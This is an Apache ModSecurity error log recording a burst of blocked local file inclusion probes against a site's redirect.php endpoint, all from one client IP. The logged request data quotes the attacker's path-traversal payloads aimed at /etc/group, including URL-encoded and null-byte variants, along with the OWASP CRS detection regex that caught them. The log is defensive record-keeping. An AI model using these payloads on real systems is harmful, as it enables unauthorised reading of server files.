[Tue May 12 05:36:43.560721 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: /etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgS9r1yOh9TvizezihawAAAFY"]
[Tue May 12 05:36:43.561337 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgS9r1yOh9TvizezihawAAAFY"]
[Tue May 12 05:36:43.561559 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgS9r1yOh9TvizezihawAAAFY"]
[Tue May 12 05:36:43.803295 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgS9r1yOh9TvizezihbgAAAFY"]
[Tue May 12 05:36:43.803354 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgS9r1yOh9TvizezihbgAAAFY"]
[Tue May 12 05:36:43.803567 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: /etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgS9r1yOh9TvizezihbgAAAFY"]
[Tue May 12 05:36:43.804206 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 13)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgS9r1yOh9TvizezihbgAAAFY"]
[Tue May 12 05:36:43.804496 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgS9r1yOh9TvizezihbgAAAFY"]
[Tue May 12 05:36:44.042030 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: %2F..%2F found within REQUEST_URI_RAW: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=..%2F..%2F..%2F..%2Fetc%2Fgroup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTNr1yOh9TvizezihcQAAAFY"]
[Tue May 12 05:36:44.042113 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTNr1yOh9TvizezihcQAAAFY"]
[Tue May 12 05:36:44.042153 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTNr1yOh9TvizezihcQAAAFY"]
[Tue May 12 05:36:44.042209 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: ../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTNr1yOh9TvizezihcQAAAFY"]
[Tue May 12 05:36:44.042793 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 20)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTNr1yOh9TvizezihcQAAAFY"]
[Tue May 12 05:36:44.043053 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 20 - SQLI=0,XSS=0,RFI=0,LFI=20,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTNr1yOh9TvizezihcQAAAFY"]
[Tue May 12 05:36:44.280278 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTNr1yOh9TvizezihcgAAAFY"]
[Tue May 12 05:36:44.280329 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTNr1yOh9TvizezihcgAAAFY"]
[Tue May 12 05:36:44.280506 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: %2F..%2F found within REQUEST_URI_RAW: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=..%2F..%2F..%2F..%2Fetc%2Fgroup%00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTNr1yOh9TvizezihcgAAAFY"]
[Tue May 12 05:36:44.280547 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../etc/group\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTNr1yOh9TvizezihcgAAAFY"]
[Tue May 12 05:36:44.280574 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTNr1yOh9TvizezihcgAAAFY"]
[Tue May 12 05:36:44.280608 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTNr1yOh9TvizezihcgAAAFY"]
[Tue May 12 05:36:44.280662 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: ../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTNr1yOh9TvizezihcgAAAFY"]
[Tue May 12 05:36:44.281299 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 33)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTNr1yOh9TvizezihcgAAAFY"]
[Tue May 12 05:36:44.281534 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 33 - SQLI=0,XSS=0,RFI=0,LFI=25,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTNr1yOh9TvizezihcgAAAFY"]
[Tue May 12 05:36:44.518877 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: %2F..%2F found within REQUEST_URI_RAW: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTNr1yOh9TvizezihcwAAAFY"]
[Tue May 12 05:36:44.518977 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTNr1yOh9TvizezihcwAAAFY"]
[Tue May 12 05:36:44.519017 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTNr1yOh9TvizezihcwAAAFY"]
[Tue May 12 05:36:44.519071 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: ../../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTNr1yOh9TvizezihcwAAAFY"]
[Tue May 12 05:36:44.519659 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 20)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTNr1yOh9TvizezihcwAAAFY"]
[Tue May 12 05:36:44.519881 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 20 - SQLI=0,XSS=0,RFI=0,LFI=20,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTNr1yOh9TvizezihcwAAAFY"]
[Tue May 12 05:36:44.757160 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTNr1yOh9TvizezihdAAAAFY"]
[Tue May 12 05:36:44.757222 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTNr1yOh9TvizezihdAAAAFY"]
[Tue May 12 05:36:44.757399 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: %2F..%2F found within REQUEST_URI_RAW: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTNr1yOh9TvizezihdAAAAFY"]
[Tue May 12 05:36:44.757438 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../../etc/group\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTNr1yOh9TvizezihdAAAAFY"]
[Tue May 12 05:36:44.757467 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTNr1yOh9TvizezihdAAAAFY"]
